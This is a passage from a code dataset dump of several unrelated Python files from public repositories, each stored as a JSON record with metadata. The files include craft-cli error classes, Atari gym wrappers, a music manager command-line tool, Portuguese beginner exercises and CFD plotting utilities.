ml_dict = ({\n 'subset_ref': bdir.joinpath('_df_catkeys.parquet'),\n 'subset': bdir.joinpath('_df_processed.parquet')\n })\n\n pre = 'ml'\n ml_dict = {f\"{pre}_{k}\": v for k, v in ml_dict.items()}\n self.key_dict = self.key_dict | ml_dict\n\n\n\n\n\n\n# %% codecell\n\n\n\n\n\n\n\n\n\n\n\n# %% codecell\n","repo_name":"webclinic017/algotrading-20","sub_path":"multiuse/pathClasses/fpaths_api.py","file_name":"fpaths_api.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2660039372","text":"__all__ = [\n \"CraftError\",\n]\n\nfrom typing import Optional\n\n\nclass CraftError(Exception):\n \"\"\"Signal a program error with a lot of information to report.\"\"\"\n\n message: str\n \"\"\"The main message to the user, to be shown as first line (and probably only that,\n according to the different modes); note that in some cases the log location will be\n attached to this message.\"\"\"\n\n details: Optional[str]\n \"\"\"The full error details received from a third party which originated the error\n situation.\"\"\"\n\n resolution: Optional[str]\n \"\"\"An extra line indicating to the user how the error may be fixed or avoided (to be\n shown together with ``message``).\"\"\"\n\n docs_url: Optional[str]\n \"\"\"An URL to point the user to documentation (to be shown together with ``message``).\"\"\"\n\n logpath_report: bool\n \"\"\"Whether the location of the log filepath should be presented in the screen as the\n final message.\"\"\"\n\n reportable: bool\n \"\"\"If an error report should be sent to some error-handling backend (like Sentry).\"\"\"\n\n retcode: int\n \"\"\"The code to return when the application finishes.\"\"\"\n\n def __init__( # noqa: PLR0913 (too many arguments)\n self,\n message: str,\n *,\n details: Optional[str] = None,\n resolution: Optional[str] = None,\n docs_url: Optional[str] = None,\n logpath_report: bool = True,\n reportable: bool = True,\n retcode: int = 1,\n ) -> None:\n super().__init__(message)\n self.details = details\n self.resolution = resolution\n self.docs_url = docs_url\n self.logpath_report = logpath_report\n self.reportable = reportable\n self.retcode = retcode\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, CraftError):\n return all(\n [\n self.args == other.args,\n self.details == other.details,\n 
self.resolution == other.resolution,\n self.docs_url == other.docs_url,\n self.logpath_report == other.logpath_report,\n self.reportable == other.reportable,\n self.retcode == other.retcode,\n ]\n )\n return NotImplemented\n\n\nclass ArgumentParsingError(Exception):\n \"\"\"Exception used when an argument parsing error is found.\"\"\"\n\n\nclass ProvideHelpException(Exception): # noqa: N818 (Exception should have an Error suffix)\n \"\"\"Exception used to provide help to the user.\"\"\"\n","repo_name":"canonical/craft-cli","sub_path":"craft_cli/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"16572929269","text":"import gym\nimport numpy as np\n\n\n## Fire reset wrapper\nclass FireReset(gym.Wrapper):\n \"\"\"Fire reset wrapper for gym.Env.\n Take action \"fire\" on reset.\n\n Args:\n env (gym.Env): The environment to be wrapped.\n \"\"\"\n\n def __init__(self, env):\n super().__init__(env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE', (\n 'Only use fire reset wrapper for suitable environment!')\n assert len(env.unwrapped.get_action_meanings()) >= 3, (\n 'Only use fire reset wrapper for suitable environment!')\n\n def step(self, action):\n\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset(**kwargs)\n obs, _, done, _ = self.env.step(1)\n\n if done:\n obs = self.env.reset(**kwargs)\n\n return obs\n\n\n## Noop reset env\nclass NoopResetEnv(gym.Wrapper):\n def __init__(self, env, noop_max=30):\n \"\"\"Sample initial states by taking random number of no-ops on reset.\n No-op is assumed to be action 0.\n \"\"\"\n gym.Wrapper.__init__(self, env)\n self.noop_max = noop_max\n self.override_num_noops = None\n self.noop_action = 0\n assert env.unwrapped.get_action_meanings()[0] == 'NOOP'\n\n def _reset(self, **kwargs):\n \"\"\" Do no-op action for a number of steps in [1, noop_max].\"\"\"\n self.env.reset(**kwargs)\n\n if self.override_num_noops is not None:\n noops = self.override_num_noops\n\n else:\n noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101\n\n assert noops > 0\n obs = None\n\n for _ in range(noops):\n\n obs, _, done, _ = self.env.step(self.noop_action)\n\n if done:\n obs = self.env.reset(**kwargs)\n\n return obs\n\n\n## Episodic life env\nclass EpisodicLifeEnv(gym.Wrapper):\n \"\"\"Make end-of-life == end-of-episode, but only reset on true game over.\n Done by DeepMind for the DQN since it helps value estimation.\n\n Args:\n env (gym.Env): The environment to be wrapped.\n \"\"\"\n\n def __init__(self, env):\n gym.Wrapper.__init__(self, env)\n self.lives = 0\n self.was_real_done = True\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n self.was_real_done = True\n # check current lives, make loss of life terminal,\n # then update lives to handle bonus lives\n lives = self.env.unwrapped.ale.lives()\n\n if lives < self.lives and lives > 0:\n # for Qbert sometimes we stay in lives == 0 condition for a few frames\n # so its important to keep lives > 0, so that we only reset once\n # the environment advertises done.\n done = True\n self.was_real_done = False\n self.lives = lives\n\n return obs, reward, done, info\n\n def reset(self):\n \"\"\"Reset only when lives are exhausted.\n This way all states are still reachable even though lives are episodic,\n and the learner need not know about any of this behind-the-scenes.\n \"\"\"\n if self.was_real_done:\n 
obs = self.env.reset()\n            self.lives = 0\n\n        else:\n            # no-op step to advance from terminal/lost life state\n            obs, _, _, info = self.env.step(0)\n            self.lives = self.env.unwrapped.ale.lives()\n\n        return obs\n\n\n## Max and skip env\nclass MaxAndSkipEnv(gym.Wrapper):\n    \"\"\"Return only every `skip`-th frame.\n\n    Args:\n        env (gym.Env): The environment to be wrapped.\n        skip (int): The frame mark to be skipped.\n    \"\"\"\n    def __init__(self, env=None, skip=4):\n        super(MaxAndSkipEnv, self).__init__(env)\n        # most recent raw observations (for max pooling across time steps)\n        self._obs_buffer = np.zeros((2, ) + env.observation_space.shape, dtype=np.uint8)\n        self._skip = skip\n\n    def step(self, action):\n        \"\"\"Repeat action, sum reward, and max over last two observations\"\"\"\n        total_reward = 0.0\n        done = None\n\n        for i in range(self._skip):\n            obs, reward, done, info = self.env.step(action)\n\n            if i == self._skip - 2:\n                self._obs_buffer[0] = obs\n\n            elif i == self._skip - 1:\n                self._obs_buffer[1] = obs\n\n            total_reward += reward\n\n            if done:\n                break\n\n        max_frame = self._obs_buffer.max(axis=0)\n\n        return max_frame, total_reward, done, info\n","repo_name":"skorpion21sic/Pong-CNN-DQN","sub_path":"utils/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38519009129","text":"import csv\nfrom pycassa.pool import ConnectionPool\nimport sys\nfrom pycassa.columnfamily import ColumnFamily\n\npool = ConnectionPool('mykeyspace', ['localhost:9042'])\ncf = ColumnFamily(pool, \"NBD\")\n\nwith open('bank-full.csv', 'rb') as csvfile:\n    reader = csv.DictReader(csvfile)\n    for row in reader:\n        print(str(row))\n        key = row['id']\n        del row['id']\n        cf.insert(key, row)\npool.dispose()","repo_name":"maalekkk/non-relational-databases","sub_path":"src/main/java/com/campaign/banksMarketingCampaign/filler/data_filler.py","file_name":"data_filler.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10154629534","text":"import sys\nimport getopt\nimport logging\n\nfrom gameserver import GameServer\n\n\ndef main(argv):\n    help_message = '''\n    Usage:\n        python3 main.py -p <port> -a <web_server_address> -q <web_server_port>\n    '''\n    port = 8586\n    web_server_address = \"localhost\"\n    web_server_port = 8585\n    try:\n        opts, _ = getopt.getopt(argv, \"hp:a:q:\", [\"help\", \"port=\", \"address=\", \"qort=\"])\n    except getopt.GetoptError:\n        print(help_message)\n        sys.exit(2)\n    for opt, arg in opts:\n        if opt in (\"-h\", \"--help\"):\n            print(help_message)\n            sys.exit()\n        elif opt in (\"-p\", \"--port\"):\n            port = int(arg)\n        elif opt in (\"-a\", \"--address\"):\n            web_server_address = arg\n        elif opt in (\"-q\", \"--qort\"):\n            web_server_port = int(arg)\n    gs = GameServer(web_server_address, web_server_port, port)\n    gs.run()\n\n\nif __name__ == \"__main__\":\n    logging.basicConfig(level=logging.DEBUG)\n    main(sys.argv[1:])\n","repo_name":"Parsa2820/cn-homeworks","sub_path":"hw1/game-server/maings.py","file_name":"maings.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33133677467","text":"#!/usr/bin/python\nfrom __future__ import print_function # Backwards Compatibility: Ensures that the built-in print function from <3.0 Python prints a string instead of a tuple.\nfrom music_datastore import *\nfrom input_error import InputError\nfrom extractor import 
*\nimport sys, os\n\nscript_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\nrel_path = \"sample_in.txt\"\nfile_name = os.path.join(script_dir, rel_path)\n\ndef main():\n MusicDatastore.instance = MusicDatastore() # Sets up MusicDatastore\n main_loop()\n\ndef educate_this_user():\n print(\"There are 3 main arguments: add, list, and listen.\")\n print(hilite(\"----ADD COMMAND----\", 1, True))\n print(\"The add command has 3 sub arguments: artist, album, and track.\")\n print(\"Before adding an album, the artist must exist.\")\n print(\"Before adding a track, the album and artist must exist.\")\n print(\"USAGE: add artist bob\")\n print('USAGE: add album \"The amazing race\" by bob')\n print('USAGE: add track \"Great song\" on \"The amazing race\" by bob')\n print(hilite(\"----LIST COMMAND----\", 1, True))\n print(\"The list command has 3 subcommands and 1 optional value: artists, albums, tracks, and [top].\")\n print(\"USAGE: list artists\")\n print(\"USAGE: list albums by bob\")\n print(\"USAGE: list tracks on \\\"The amazing race\\\" by bob\")\n print(\"USAGE: list top q albums\")\n print(\"USAGE: list top 3 tracks\")\n print(hilite(\"----LISTEN COMMAND----\", 1, True))\n print(\"This command increments the play count on a track. You must provide the track, album, and artist.\")\n print(\"USAGE: listen to \\\"song\\\" on \\\"album name\\\" by bob\")\n print(hilite(\"----END----\", True, True))\n\ndef process_user_input(line):\n if line.lower() == \"quit\".lower():\n sys.exit(1)\n elif line.lower() == \"help\".lower():\n educate_this_user()\n else:\n decipher_command(line)\n\n# Reads sample input file from scripts directory and runs it as if imitating a user\ndef read_input():\n with open(file_name) as f:\n for line in f:\n try:\n print(line.rstrip(\"\\n\"))\n decipher_command(line.rstrip(\"\\n\"))\n except InputError as e:\n print(hilite(\"Input Error:\", -1, True), e.value)\n pass\n\ndef decipher_command(line):\n raw_commands = line.split(\" \") # Main data structure used to interpret user data.\n if len(raw_commands) < 1:\n raise InputError('Incorrect usage. Need more info. Type help for examples.')\n\n # Process main commands\n primary_commands = ['add', 'list', 'listen']\n if sanitize_command(raw_commands, primary_commands, 0) == True:\n funcdict[raw_commands[0]](raw_commands)\n else:\n raise InputError(\"First argument is invalid. Use one of these\", primary_commands)\n\n# command_add handles all logic of the 'add' command and subcommands after the we've determined the user wants to add something\ndef command_add(raw_commands):\n valid_commands = ['artist', 'album', 'track']\n if sanitize_command(raw_commands, valid_commands, 1) == False:\n raise InputError(\"Sub command is invalid. 
Use valid arguments: \", valid_commands, \"after add\")\n return\n subcommand_index = 2\n if raw_commands[1] == 'artist': # check to lower\n artist_name, count = get_artist_info(raw_commands, subcommand_index)\n get_music_datastore().add_artist(artist_name)\n elif raw_commands[1] == 'album':\n album_name, artist_name = get_album_info(raw_commands, subcommand_index)\n get_music_datastore().add_album(album_name, artist_name)\n elif raw_commands[1] == 'track':\n track_name, album_name, artist_name = get_track_info(raw_commands, subcommand_index)\n get_music_datastore().add_track(track_name, album_name, artist_name)\n else:\n print(\"ERR: command_add\")\n\n# command_list handles all logic to display lists and handling subcommands after we've determine the user wants to list something\ndef command_list(raw_commands):\n valid_commands = ['top', 'albums', 'tracks', 'artists']\n if sanitize_command(raw_commands, valid_commands, 1) == False:\n raise InputError(\"Sub argument is invalid. Use valid arguments: \", valid_commands, \"after list\")\n\n if raw_commands[1] == 'top':\n value, count = next_input(raw_commands, 2)\n if count < 0:\n raise InputError(\"Please enter how many to print. To print all value input 'q'\")\n if not value.isdigit() and value != 'q':\n raise InputError(\"Sub argument is invalid. Use a number or letter 'q'\")\n if value == 'q':\n desired_count = -1\n else:\n desired_count = int(value)\n\n valid_commands = ['artists','tracks', 'albums']\n if sanitize_command(raw_commands, valid_commands, 3) == False:\n raise InputError(\"Sub argument is invalid. Use valid commands: \", valid_commands)\n desired_category = raw_commands[3]\n\n if desired_category == 'artists':\n get_music_datastore().list_top_artists(desired_count)\n elif desired_category == 'tracks':\n get_music_datastore().list_top_tracks(desired_count)\n elif desired_category == 'albums':\n get_music_datastore().list_top_albums(desired_count)\n else:\n print(\"ERR: command_list top\")\n else:\n valid_commands = ['albums', 'tracks', 'artists']\n if sanitize_command(raw_commands, valid_commands, 1) == False:\n raise InputError(\"Sub argument (\", raw_commands[1], \") is invalid. Use valid argument: \", valid_commands)\n desired_category = raw_commands[1]\n if desired_category == 'albums':\n result = get_album_info(raw_commands, 1)\n get_music_datastore().list_albums(result)\n elif desired_category == 'tracks':\n result = get_track_info(raw_commands, 1)\n get_music_datastore().list_tracks(result)\n elif desired_category == 'artists':\n get_music_datastore().list_artists()\n else:\n print(\"ERR: command_list normal\", raw_commands)\n\n# command_listen handles logic to find a desired track and increment it's play_count\ndef command_listen(raw_commands):\n if len(raw_commands) < 4:\n raise InputError(\"Command usage: listen to \\\"song\\\" on \\\"album\\\" by \\\"artist\\\"\")\n track_values = get_track_info(raw_commands, 2)\n get_music_datastore().listen_to(track_values)\n\n# Abstraction for string emphasis. 
Useful in a bland CLI\ndef hilite(string, status, bold):\n    attr = []\n    if status == 1:\n        attr.append('32') # green\n    elif status == -1:\n        attr.append('31') # Red\n    if bold:\n        attr.append('1')\n    return '\\x1b[%sm%s\\x1b[0m' % (';'.join(attr), string)\n\ndef run_test():\n    # automated = ['add artist bob',\n    #             'add album foo by bob',\n    #             'list albums by bob',\n    #             'add track \"sunday blues\" on foo by bob',\n    #             'add track \"crushed heart\" on foo by bob',\n    #             'add track \"rock on\" on foo by bob',\n    #             'list tracks on foo by bob',\n    #             'listen to \"sunday blues\" on foo by bob',\n    #             'list top 3 tracks',\n    #             'add artist \"Smiling Lemurs\"',\n    #             'add album \"Sunbeams and Snowdrifts\" by \"Smiling Lemurs\"',\n    #             'list top 3 albums',\n    #             'list top 3 artists']\n    # for user_input in automated:\n    #     user_input = str(user_input.strip())\n    #     process_user_input(user_input.rstrip(\"\\n\"))\n    return\n\ndef main_loop():\n    has_read_from_file = False\n    run_test()\n    if len(sys.argv) > 1:\n        file_name = sys.argv[1]\n\n    print(\"Welcome to Music Manager. Type help to get started or\", hilite(\"quit\", 1, True), \"to quit, or\", hilite(\"help\", 1, True), \"for help.\")\n    while True:\n        try:\n            # raw_input was renamed to input in Python 3.0; reading it only in the except branch keeps support for 2.7, which is widely used, and 2.6, which is stock on Mac machines.\n            try: user_input = raw_input(\"\")\n            except NameError:\n                user_input = input(\"\")\n\n            user_input = str(user_input.rstrip(\"\\n\").strip()) # Strip newline, strip outer tabs and spaces\n            process_user_input(user_input)\n        except InputError as e:\n            print(hilite(\"Input Error:\", -1, True), e.value)\n            pass\n\n# Dictionary to functions\nfuncdict = {\n    'add': command_add,\n    'listen': command_listen,\n    'list': command_list\n}\n\nmain() # Initial point of execution. Runs the program.\n","repo_name":"DrewWeth/Etsy_Proj","sub_path":"source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30661231300","text":"#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 1 : \r\nFaça um programa que peça dois números inteiros e imprima a soma desses dois números '''\r\nnumeros = list()\r\nsoma = 0\r\n#Recebendo os valores e adicionando no array numeros[]\r\nfor x in range (0,2):\r\n    print(\"Digite o \",x+1,\"numero:\")\r\n    numeros.append(int(input()))\r\n    #somando o valor recebido no array numeros[]\r\n    soma += numeros[x]\r\n#printando o valor da soma depois de ter perguntado os 2 valores no FOR acima\r\nprint(\"SOMA:\",soma,\"\\n \\n \\n \\n \\n\")\r\n#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 2 : \r\nEscreva um programa que leia um valor em metros e o exiba convertido em milímetros '''\r\n#Recebendo o valor em metros\r\nmetros = int(input(\"Digite o valor em metros: \"))\r\n#Imprimindo em Milimetros(metros * 1000)\r\nprint(metros*1000,\"MM\\n \\n \\n \\n \\n\")\r\n\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 3 : \r\nEscreva um programa que leia a quantidade de dias, horas, minutos e segundos do usuário. Calcule\r\no total em segundos. 
'''\r\n\r\n#Recebendo os valores de Dias, horas, minutos e segundos\r\ndias = int(input(\"Digite quantidade de dias: \"))\r\ndias *= 86400\r\nhoras = int(input(\"Digite quantidade em horas:\"))\r\nhoras *= 3600\r\nminutos = int(input(\"Digite quantidade em minutos:\"))\r\nminutos *= 60\r\nsegundos = int(input(\"Digite quantidade em segundos:\"))\r\n#somando o total em segundos\r\nsegundos += dias + horas + minutos\r\n#Imprimindo o valor\r\nprint(\"Total em segundos:\",segundos,\"\\n \\n \\n \\n \\n\")\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 4 : \r\nFaça um programa que calcule o aumento de um salário. Ele deve solicitar o valor do salário e a\r\nporcentagem do aumento. Exiba o valor do aumento e do novo salário. '''\r\n#Recebendo os valores\r\nsal_atual = float(input(\"Digite seu salario atual: \"))\r\npor_aumento = float(input(\"Digite porcentagem de aumento:\"))\r\n#Calculando o aumento e o novo salário\r\naumento = (sal_atual*por_aumento)/100\r\nnovo_sal = aumento + sal_atual\r\n#printando na tela os resultados\r\nprint(\"O valor do aumento sera: \",aumento)\r\nprint(\"O novo salario sera: \",novo_sal, \"\\n \\n \\n \\n \\n\")\r\n\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 5 : \r\nSolicite o preço de uma mercadoria e o percentual de desconto. Exiba o valor do desconto e o\r\npreço a pagar. '''\r\n#Recebendo os valores\r\npreco = float(input(\"Digite o valor da mercadoria: \"))\r\npercent_desc = float(input(\"Digite o percentual de desconto: \"))\r\n#Calculando o desconto e o preço a pagar (preço menos desconto)\r\ndesconto = (preco*percent_desc)/100\r\nnovo_valor = preco - desconto\r\n# Imprimindo o resultado\r\nprint(\"Valor do desconto: \",desconto,\"R$\")\r\nprint(\"Novo valor: \",novo_valor,\"R$ \\n \\n \\n \\n \\n\")\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 6 : \r\nCalcule o tempo de uma viagem de carro. Pergunte a distância a percorrer e a velocidade média\r\nesperada para a viagem. '''\r\n#Recebendo DeltaS e VM\r\ndist = float(input(\"Digite a distancia da viagem em KM: \"))\r\nvm = float(input(\"Digite a velocidade média esperada KM/H: \"))\r\n#calculando o tempo com a formula: tempo = distância / velocidade média\r\ndt = dist/vm\r\n#imprimindo o resultado\r\nprint(\"O tempo estimado de viagem e: \",dt,\"horas \\n \\n \\n \\n \\n\")\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 7 : \r\nConverta uma temperatura digitada em Celsius para Fahrenheit. F = 9*C/5 + 32'''\r\n#Recebendo o valor em celsius\r\ncelsius = float(input(\"Digite a temperatura em Celsius: \"))\r\n#convertendo de celsius para fahrenheit com a equação mencionada acima\r\nfahren = ((9*celsius)/5)+32\r\n#imprimindo o resultado\r\nprint(\"F : \",fahren,\"\\n \\n \\n \\n \\n\")\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\n''' #Exercise 8 : \r\nFaça agora o contrário, de Fahrenheit para Celsius. 
C/5 = F−32/9'''\n#Recebendo o valor em fahrenheit\nfahren = float(input(\"Digite a temperatura em Fahrenheit: \"))\n#convertendo de fahrenheit para celsius com a equação mencionada acima\ncelsius = ((fahren-32)/9) * 5\n#imprimindo o resultado\nprint(\"Celsius C %.2f \\n\\n\\n\\n\\n\\n\\n\\n \" %celsius)\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 9 : \nEscreva um programa que pergunte a quantidade de km percorridos por um carro alugado pelo\nusuário, assim como a quantidade de dias pelos quais o carro foi alugado. Calcule o preço a pagar,\nsabendo que o carro custa R$ 60,00 por dia e R$ 0,15 por km rodado.'''\n#recebendo os dados\nkm = float(input(\"Quantidade de KM percorridos: \"))\ndias = int(input(\"Quantidade de dias alugados: \"))\n#imprimindo o resultado conforme a conta acima: 60 por dia x 15 cent. por km\nprint(\"Total R$: %.2f \\n\\n\\n\\n\\n\\n\\n\"% ((dias*60)+(km*0.15)))\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 10 : \nEscreva um programa para calcular a redução do tempo de vida de um fumante. Pergunte a\nquantidade de cigarros fumados por dia e quantos anos ele já fumou. Considere que um fumante\nperde 10 minutos de vida a cada cigarro, calcule quantos dias de vida um fumante perderá. Exiba o\ntotal de dias.'''\n#recebendo os valores\ncig = int(input(\"Favor, digite quantos cigarros fumados por dia: \"))\nanos = int(input(\"Favor, digite quantos anos ja fumou:\"))\n#calculando quantos dias de vida perderá cigarros fumados por dia x 10 (pra ter o valor em minutos por dia),\n#anos x 365 (para ter o valor de anos em dias), multiplica o valor de minutos por dia x total de dias (para ter o valor total em minutos)\n# e divide por 1440 para converter o valor de minutos para dias, pois 1440 minutos = 1dia\nprint(\"Voce perdera %d dias de sua vida \\n\\n\\n\\n\\n\\n\\n\\n\" %((cig*10)*(anos*365)/1440))\n\n\n#--------------------------------------------------------------------------------------------\n\n''' #Exercise 11 : \nSabendo que str( ) converte valores numéricos para string, calcule quantos dígitos há em 2 elevado\na um milhão. 
'''\n#imprimindo o solicitado convertendo int para str e pegando a quantidade de algarismos através do len\nprint (\"Existem %s digitos em 2^1000000\" %len(str(2**1000000)))\n#teste teste\n\n#--------------------------------------------------------------------------------------------\n\n","repo_name":"alanPaivaAsp/PythonList","sub_path":"list1/list1.py","file_name":"list1.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33587311168","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n#from src.utils.InitialConds import ReadFile\nimport os\nimport argparse\n\nSIM = \"folder\"\n\ndef ReadFile(filename):\n\n data = []\n\n with open(filename) as f:\n for line in f.readlines():\n data.append(float(line.strip()))\n \n return np.array(data, dtype=float)\n\ndef ReadFile2(filename):\n\n data = []\n\n with open(filename) as f:\n for line in f.readlines():\n data.append((line.strip()))\n \n return data\n\ndef SIMPLE_convergence(residuals, SIM_num):\n\n u_conv = []\n v_conv = []\n for residual in residuals:\n residual_it = residual.strip().strip(\"[]\").split(\",\")\n u_conv.append(float(residual_it[0]))\n v_conv.append(float(residual_it[1]))\n\n plt.plot(range(len(residuals)), u_conv, label=\"U Residuals\")\n plt.plot(range(len(residuals)), v_conv, label=\"V Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"SIMPLE Outer Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/SIMPLE_conv_curve.png\")\n\ndef momentum_convergence(residuals_x, residuals_y, SIM_num):\n\n initial_x = []\n final_x = []\n initial_y = []\n final_y = []\n for i in range(len(residuals_x)):\n residual_x_it = residuals_x[i].strip().strip(\"[]\").split(\",\")\n residual_y_it = residuals_y[i].strip().strip(\"[]\").split(\",\")\n initial_x.append(float(residual_x_it[0]))\n final_x.append(float(residual_x_it[1]))\n initial_y.append(float(residual_y_it[0]))\n final_y.append(float(residual_y_it[1]))\n \n plt.plot(range(len(initial_x)), initial_x, label=\"Initial Residuals\")\n plt.plot(range(len(final_x)), final_x, label=\"Final Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"U Inner Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/u_inner_loop_conv.png\")\n plt.close()\n\n plt.plot(range(len(initial_y)), initial_y, label=\"Initial Residuals\")\n plt.plot(range(len(final_y)), final_y, label=\"Final Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"V Inner Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/v_inner_loop_conv.png\")\n plt.close()\n\ndef pressure_convergence(residuals, SIM_num):\n\n initial = []\n final = []\n for residual in residuals:\n residual_it = residual.strip().strip(\"[]\").split(\",\")\n initial.append(float(residual_it[0]))\n final.append(float(residual_it[1]))\n\n plt.plot(range(len(residuals)), initial, label=\"Initial Residuals\")\n plt.plot(range(len(residuals)), final, label=\"Final Residuals\")\n plt.legend()\n plt.xlabel(\"SIMPLE Iteration\")\n plt.ylabel(\"Residual\")\n plt.title(\"Pressure Inner Loop Convergence\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/p_inner_loop_conv.png\")\n plt.close()\n\ndef velocity_field_plot(ux_field, uy_field, uz_field, SIM_num, ncells, d):\n \n quiver_step = 2\n print(ncells, len(ux_field))\n ux_field = 
np.pad(np.flip(np.reshape(ux_field, (ncells, ncells)), axis=0), (1,1))\n uy_field = np.pad(np.flip(np.reshape(uy_field, (ncells, ncells)), axis=0), (1,1))\n uz_field = np.pad(np.flip(np.reshape(uz_field, (ncells, ncells)), axis=0), (1,1))\n x, y = np.meshgrid(np.linspace(0, ux_field.shape[0], ux_field.shape[1]), np.linspace(0, ux_field.shape[1], ux_field.shape[0]))\n\n # setting moving wall\n ux_field[0,:] = 1\n\n mags = np.linalg.norm(np.dstack((ux_field, uy_field)), axis=2)\n axis_positions = np.linspace(0, len(ux_field)-1, 6)\n axis_labels = [round((d/len(axis_positions)), 2) * i for i in range(len(axis_positions))]\n\n fig, ax = plt.subplots()\n ax.quiver(x[::quiver_step,::quiver_step], y[::quiver_step,::quiver_step], ux_field[::quiver_step,::quiver_step], uy_field[::quiver_step,::quiver_step])\n im = ax.imshow(mags, interpolation=\"spline16\", cmap=\"jet\")\n ax.set_xticks(axis_positions)\n ax.set_xticklabels(axis_labels)\n ax.set_yticks(axis_positions)\n axis_labels.reverse()\n ax.set_yticklabels(axis_labels)\n clb = fig.colorbar(im)\n clb.ax.set_title(\"m/s\")\n ax.set_title(\"Velocity Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/velocity_field.png\")\n return ax\n\ndef field(field, SIM_num, ncells, d, filename):\n\n if filename == \"x\":\n field = np.pad(np.flip(np.reshape(field, (ncells, ncells)), axis=0), (1,1))\n field[0,:] = 1\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"U (m/s)\")\n ax.set_title(\"U Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/u_field.png\")\n elif filename == \"y\":\n field = np.flip(np.reshape(field, (ncells, ncells)), axis=0)\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"V (m/s)\")\n ax.set_title(\"V Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/v_field.png\")\n elif filename == \"z\":\n field = np.pad(np.flip(np.reshape(field, (ncells, ncells)), axis=0), (1,1))\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"Z (m/s)\")\n ax.set_title(\"Z Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/z_field.png\")\n else:\n field = np.flip(np.reshape(field, (ncells, ncells)), axis=0) * 1000\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"P (Pa)\")\n ax.set_title(\"Pressure field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/p_field.png\")\n\n return ax\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--SIM_num\",\n type=int\n )\n\n args = parser.parse_args()\n\n SIM_num = args.SIM_num\n ncells = 40\n\n u_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/u_field.txt\")\n v_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/v_field.txt\")\n z_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/z_field.txt\")\n p_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/p_field.txt\")\n res_SIMPLE = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/res_SIMPLE.txt\")\n resx_momentum = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/resx_momentum.txt\")\n resy_momentum = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/resy_momentum.txt\")\n res_pressure = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/res_pressure.txt\")\n\n velocity_ax = velocity_field_plot(u_field, v_field, z_field, SIM_num, 
